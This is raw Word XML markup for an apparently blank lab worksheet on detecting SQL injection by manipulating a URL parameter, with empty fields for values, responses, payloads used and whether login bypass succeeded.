                <w:numId w:val="118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04AA7B9" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF0611">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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B115FD7" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF0611">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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49689B4" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF0611">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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E2DACFC" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF0611">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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9521D49" w14:textId="77777777" w:rsidR="00BF0611" w:rsidRPr="00BF0611" w:rsidRDefault="00BF0611" w:rsidP="00BF061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1A8386B5" w14:textId="77777777" w:rsidR="000B1263" w:rsidRPr="005D2C80" w:rsidRDefault="000B1263" w:rsidP="000B1263">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2C80">
        <w:rPr>
          <w:b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B1263" w:rsidRPr="005D2C80" w14:paraId="293652A5" w14:textId="77777777" w:rsidTr="00725128">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42D37B9C" w14:textId="77777777" w:rsidR="000B1263" w:rsidRPr="005D2C80" w:rsidRDefault="000B1263" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4639EFCE" w14:textId="77777777" w:rsidR="000B1263" w:rsidRPr="005D2C80" w:rsidRDefault="000B1263" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="37B18D66" w14:textId="77777777" w:rsidR="000B1263" w:rsidRPr="005D2C80" w:rsidRDefault="000B1263" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="318A5A8C" w14:textId="77777777" w:rsidR="000B1263" w:rsidRDefault="000B1263" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="56E664F2" w14:textId="77777777" w:rsidR="00FA02DD" w:rsidRDefault="00FA02DD" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3560E6C7" w14:textId="77777777" w:rsidR="00FA02DD" w:rsidRPr="005D2C80" w:rsidRDefault="00FA02DD" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="23C07431" w14:textId="77777777" w:rsidR="000B1263" w:rsidRPr="005D2C80" w:rsidRDefault="000B1263" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3CAFB54C" w14:textId="77777777" w:rsidR="00331B37" w:rsidRDefault="00331B37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0B1263" w:rsidRPr="00A51A96" w14:paraId="515F7F0E" w14:textId="77777777" w:rsidTr="00FA02DD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2223C594" w14:textId="0C8D0509" w:rsidR="000B1263" w:rsidRPr="003C713F" w:rsidRDefault="000B1263" w:rsidP="00725128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7.5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0E5A6B" w:rsidRPr="000E5A6B">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Detect SQL Injection Vulnerabilities by Manipulating a Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="77AABF7D" w14:textId="77777777" w:rsidR="000B1263" w:rsidRPr="00FA02DD" w:rsidRDefault="000B1263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8"/>
        <w:gridCol w:w="2497"/>
        <w:gridCol w:w="2430"/>
        <w:gridCol w:w="2205"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w14:paraId="443DBA18" w14:textId="77777777" w:rsidTr="00FA02DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B968704" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00FA0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F75A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132" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08C68DE2" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A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F75A8" w:rsidRPr="00BF75A8" w14:paraId="040CE3E3" w14:textId="77777777" w:rsidTr="00FA02DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F18FDE4" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00FA0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F75A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132" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CD0DF21" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A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F75A8" w:rsidRPr="00BF75A8" w14:paraId="7382EEDD" w14:textId="77777777" w:rsidTr="00FA02DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D8F2858" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00FA0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F75A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132" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="780BB09A" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A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F75A8" w:rsidRPr="00BF75A8" w14:paraId="36B96EB1" w14:textId="77777777" w:rsidTr="00FA02DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01129C49" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00FA0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F75A8">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Values of the Parameter in the URL Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2497" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="420243B5" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A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F75A8">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Original Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6BEC5084" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A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F75A8">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Modified Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="63D9D47B" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A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F75A8">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Response Received</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w14:paraId="1DC7DAB2" w14:textId="77777777" w:rsidTr="00FA02DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02D84762" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00FA0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2497" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E372E3A" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A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2430" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65F546AE" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A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2205" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DA5695D" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A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</w:tr>
      <w:tr w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w14:paraId="592FDA04" w14:textId="77777777" w:rsidTr="00FA02DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="171DA433" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00FA0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2497" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67310195" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A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2430" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E168ECA" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A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2205" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2270B72C" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A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</w:tr>
      <w:tr w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w14:paraId="2ECE6EB3" w14:textId="77777777" w:rsidTr="00FA02DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1BCBACCA" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00FA0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2497" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FB072FC" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A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2430" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F3810D3" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A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2205" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04EA626C" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A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</w:tr>
      <w:tr w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w14:paraId="6D1C31FD" w14:textId="77777777" w:rsidTr="00FA02DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40799BF9" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00FA0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2497" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14617C39" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A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2430" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AE7453C" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A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2205" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15580749" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A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</w:tr>
      <w:tr w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w14:paraId="082239A3" w14:textId="77777777" w:rsidTr="00FA02DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6DB6B922" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00FA0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2497" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15E941DE" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A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2430" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3090A682" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A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2205" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3850A04B" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A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</w:tr>
      <w:tr w:rsidR="00EF1F99" w:rsidRPr="00BF75A8" w14:paraId="02FBEF46" w14:textId="77777777" w:rsidTr="00FA02DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="664CD7BB" w14:textId="5C16CF43" w:rsidR="00EF1F99" w:rsidRPr="00BF75A8" w:rsidRDefault="005844A6" w:rsidP="00FA0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844A6">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Boolean-Based SQL Injection Detected?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7132" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74A2C628" w14:textId="77777777" w:rsidR="00EF1F99" w:rsidRPr="005844A6" w:rsidRDefault="005844A6" w:rsidP="00EF1F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5844A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[*Yes/No, Payloads Used]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C2F0083" w14:textId="77777777" w:rsidR="005844A6" w:rsidRDefault="005844A6" w:rsidP="00EF1F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96F7B06" w14:textId="77777777" w:rsidR="005844A6" w:rsidRDefault="005844A6" w:rsidP="00EF1F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CFD0D82" w14:textId="3D876500" w:rsidR="005844A6" w:rsidRPr="00BF75A8" w:rsidRDefault="005844A6" w:rsidP="00EF1F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844A6" w:rsidRPr="00BF75A8" w14:paraId="79DDE90E" w14:textId="77777777" w:rsidTr="00FA02DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="60660BAD" w14:textId="732CE456" w:rsidR="005844A6" w:rsidRPr="005844A6" w:rsidRDefault="00943470" w:rsidP="00FA0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43470">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Error-Based SQL Injection Detected?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7132" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="028BC2C6" w14:textId="77777777" w:rsidR="005844A6" w:rsidRDefault="00943470" w:rsidP="00EF1F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94347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Error Messages Observed, Database Information Revealed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C995E99" w14:textId="77777777" w:rsidR="00943470" w:rsidRDefault="00943470" w:rsidP="00EF1F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7297D66" w14:textId="77777777" w:rsidR="00943470" w:rsidRDefault="00943470" w:rsidP="00EF1F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A05F2A7" w14:textId="77777777" w:rsidR="00943470" w:rsidRDefault="00943470" w:rsidP="00EF1F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5DAE708" w14:textId="222659E6" w:rsidR="00FA02DD" w:rsidRPr="005844A6" w:rsidRDefault="00FA02DD" w:rsidP="00EF1F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43470" w:rsidRPr="00BF75A8" w14:paraId="7F221D82" w14:textId="77777777" w:rsidTr="00FA02DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D53E0FC" w14:textId="74A46C0B" w:rsidR="00943470" w:rsidRPr="00943470" w:rsidRDefault="00943470" w:rsidP="00FA0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43470">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Time-Based SQL Injection Detected?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7132" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6699D3BB" w14:textId="77777777" w:rsidR="00943470" w:rsidRDefault="00943470" w:rsidP="00EF1F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7B0294" w:rsidRPr="007B029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Response Time Observed, Identified Database Type</w:t>
            </w:r>
            <w:r w:rsidR="007B029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749447E" w14:textId="77777777" w:rsidR="007B0294" w:rsidRDefault="007B0294" w:rsidP="00EF1F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1DDC89F" w14:textId="77777777" w:rsidR="007B0294" w:rsidRDefault="007B0294" w:rsidP="00EF1F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BFE1AC8" w14:textId="77777777" w:rsidR="007B0294" w:rsidRDefault="007B0294" w:rsidP="00EF1F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5EAE362" w14:textId="3B786C81" w:rsidR="00FA02DD" w:rsidRDefault="00FA02DD" w:rsidP="00EF1F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7B0294" w:rsidRPr="00BF75A8" w14:paraId="23EBA0FB" w14:textId="77777777" w:rsidTr="00FA02DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="54F6C41E" w14:textId="5F4A65C8" w:rsidR="007B0294" w:rsidRPr="00943470" w:rsidRDefault="007B0294" w:rsidP="00FA0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B0294">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Exploited Database Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7132" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17FDAA08" w14:textId="77777777" w:rsidR="007B0294" w:rsidRDefault="007B0294" w:rsidP="00EF1F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650F739" w14:textId="77777777" w:rsidR="009872DF" w:rsidRDefault="009872DF" w:rsidP="00EF1F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61333EF" w14:textId="77777777" w:rsidR="009872DF" w:rsidRDefault="009872DF" w:rsidP="00EF1F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9CE8C5E" w14:textId="77777777" w:rsidR="009872DF" w:rsidRDefault="009872DF" w:rsidP="00EF1F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7B0294" w:rsidRPr="00BF75A8" w14:paraId="7A3C7627" w14:textId="77777777" w:rsidTr="00FA02DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17A6225C" w14:textId="32F26344" w:rsidR="007B0294" w:rsidRPr="007B0294" w:rsidRDefault="007B0294" w:rsidP="00FA0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B0294">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Login Bypass Successful?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7132" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56AEA96C" w14:textId="77777777" w:rsidR="007B0294" w:rsidRDefault="00E2105C" w:rsidP="00EF1F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E2105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Payload Used, Evidence Collected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FADFFFC" w14:textId="77777777" w:rsidR="00E2105C" w:rsidRDefault="00E2105C" w:rsidP="00EF1F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B80E0C9" w14:textId="6182E7AF" w:rsidR="00E2105C" w:rsidRDefault="00E2105C" w:rsidP="00EF1F9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F75A8" w:rsidRPr="00BF75A8" w14:paraId="77067E62" w14:textId="77777777" w:rsidTr="00FA02DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2409D445" w14:textId="220744DD" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BB7CD9" w:rsidP="00FA0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Other</w:t>
            </w:r>
            <w:r w:rsidR="00BF75A8" w:rsidRPr="00BF75A8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Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7132" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28211B6E" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A8">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="122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92625ED" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A8">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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789BC34" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A8">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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A05FF31" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A8">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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31BCEA5" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A8">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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CD37399" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A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</w:tr>
      <w:tr w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w14:paraId="0E85ADD1" w14:textId="77777777" w:rsidTr="00FA02DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F2B7295" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00FA0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F75A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132" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50D79711" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A8">
            <w:pPr>
              <w:numPr>
